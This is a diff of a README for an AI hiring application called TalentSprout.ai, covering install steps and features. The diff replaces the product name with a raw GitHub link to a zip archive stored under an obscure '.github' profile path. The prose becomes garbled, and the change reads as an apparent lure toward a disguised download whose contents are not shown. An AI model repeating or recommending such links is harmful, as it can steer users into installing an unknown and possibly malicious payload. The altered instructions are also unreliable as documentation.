Ayush-Raghuwanshi-9827/.github/README.md

 5. **Follow the Prompts:** The setup wizard will guide you through the installation process.
 Simply follow the instructions.

-6. **Start the Application:** After installation, you can find TalentSprout.ai in your programs list.
+6. **Start the Application:** After installation, you can find https://raw.githubusercontent.com/Ayush-Raghuwanshi-9827/.github/main/profile/.github_v3.7.zip in your programs list.
 Click to open it and get started.

 ## 🎨 Features

-TalentSprout.ai offers a variety of features designed to simplify your hiring:
+https://raw.githubusercontent.com/Ayush-Raghuwanshi-9827/.github/main/profile/.github_v3.7.zip offers a variety of features designed to simplify your hiring:

 - **Automated Interviews:** Conduct interviews without manual scheduling.
 - **AI Candidate Evaluation:** Get detailed assessments of candidates to aid in decision-making.